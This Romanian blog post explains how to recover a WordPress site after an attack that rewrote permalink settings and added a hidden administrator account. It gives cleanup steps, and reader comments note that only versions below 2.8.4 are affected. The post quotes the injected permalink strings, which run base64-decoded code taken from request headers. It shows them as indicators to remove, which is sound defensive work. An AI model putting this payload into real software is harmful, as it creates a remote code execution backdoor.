by

Despre ultimul atac WordPress SQL Injection

Multe site-uri (în special cele în limba engleză) ce rulează pe platforma wordpress au fost ţinta unor atacuri SQL. Structura link-urilor blogului dumneavoastră va fi stricată, astfel încât acestea nu vor mai merge. Un exemplu este blogul eok.ro.

Cum rezolvaţi această problemă?

Intraţi în „Settings” – „Permalink Settings”. Aici veţi găsi adăugat unul din următoarele coduri:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Alegeţi la „Common settings” o altă structură sau înlăturaţi codul manual.

Următorul pas este să găsiţi un alt administrator şi să îl ştergeţi sau să îi scădeţi rang-ul. Acest lucru poate fi făcut din PHPMyAdmin sau din panoul de administrare wordpress, urmărind câţiva paşi:

1. Intraţi în Users şi aflaţi ultimul user înregistrat.
2. Daţi click pe acesta, iar în structura link-ului veţi găsi „userid=” şi un număr. La acest număr adăugaţi un 1 (ex.: dacă este 3 va rezulta 4). După ce aţi schimbat numărul daţi enter.
3. Schimbaţi numele acestuia, apoi rang-ul (subscriber).
4. Mergeţi în Users şi ştergeţi-l.

Mai multe detalii aici.

Lasă un comentariu

Comment

  1. @Florin Puscas, Florin Grozea
    Salut. Îmi puteţi spune ce versiune de WordPress rula atunci când s-a produs incidentul ?

  2. @Florin Puscas
    Mersi frumos de răspuns. S-a confirmat între timp. Problema afectează doar blogurile mai vechi (<2.8.4) sau unde a fost creat între timp un backdoor. După actualizare vei fi în „siguranţă”.